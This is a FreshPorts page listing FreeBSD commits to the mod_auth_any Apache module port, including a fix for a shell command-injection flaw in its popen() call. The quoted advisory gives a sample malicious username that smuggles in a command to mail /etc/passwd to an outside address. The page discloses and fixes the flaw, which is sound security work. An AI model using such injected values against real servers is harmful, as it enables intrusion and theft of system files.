notbugAs an Amazon Associate I earn from qualifying purchases.
Want a good read? Try FreeBSD Mastery: Jails (IT Mastery Book 15)Want a good monitor light? See my photosAll times are UTC		 Ukraine

Bot filter coming soon

To deter bots pegging the database CPU to 100%, a bot testing filter to be added to the website. This should not affect newsfeeds etc. Anubis seems light-weight - it''''''''s already in use within the FreeBSD Project. This notice is just a heads up in case you see something odd. This notice will be updated after Anubis is installed.

non port: www/mod_auth_any/files/patch-mod_auth_any.c

Number of commits found: 2

Monday, 6 Oct 2003
13:00 edwin search for other commits by this committer 
[update orphand port] www/mod_auth_any: Update to 1.3.2 and take maintainership

        - update to 1.3.2
        - update WWW
        - take maintainership

PR:             ports/57413
Submitted by:   Clement Laforet <sheepkiller@cultdeadsheep.org>
Original commit
Tuesday, 25 Mar 2003
04:23 lioux search for other commits by this committer 
o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:  mod_auth_any CVS [2],
                nalin@redhat.com [3]
Original commit

Number of commits found: 2
Login
User Login
Create account

Servers and bandwidth provided by
New York Internet, iXsystems, and RootBSD

This site
What is FreshPorts?
About the authors
Issues
FAQ
How big is it?
Security Policy
Privacy
Blog
Contact

Search
Enter Keywords:
 
more...

Latest Vulnerabilities
gitlabMay 10
postgresql13-clientMay 08
postgresql13-serverMay 08
postgresql14-clientMay 08
postgresql14-serverMay 08
postgresql15-clientMay 08
postgresql15-serverMay 08
postgresql16-clientMay 08
postgresql16-serverMay 08
postgresql17-clientMay 08
postgresql17-serverMay 08
chromiumMay 07
ungoogled-chromiumMay 07
chromiumMay 06
ungoogled-chromiumMay 06

7 vulnerabilities affecting 130 ports have been reported in the past 14 days

* - modified, not new

All vulnerabilities

Last processed:
2025-05-10 04:24:22 UTC


Ports
Home
Categories
Deleted ports
Sanity Test Failures
Newsfeeds

Statistics
Graphs
NEW Graphs (Javascript)

Calculated hourly:
Port count 33278
Broken 119
Deprecated 291
Ignore 235
Forbidden 1
Restricted 2
No CDROM 1
Vulnerable 34
Expired 33
Set to expire 236
Interactive 0
new 24 hours 0
new 48 hours9
new 7 days50
new fortnight75
new month117
Servers and bandwidth provided by
New York Internet, iXsystems, and RootBSD 		Valid HTML, CSS, and RSS. Copyright © 2000-2025 Dan Langille. All rights reserved.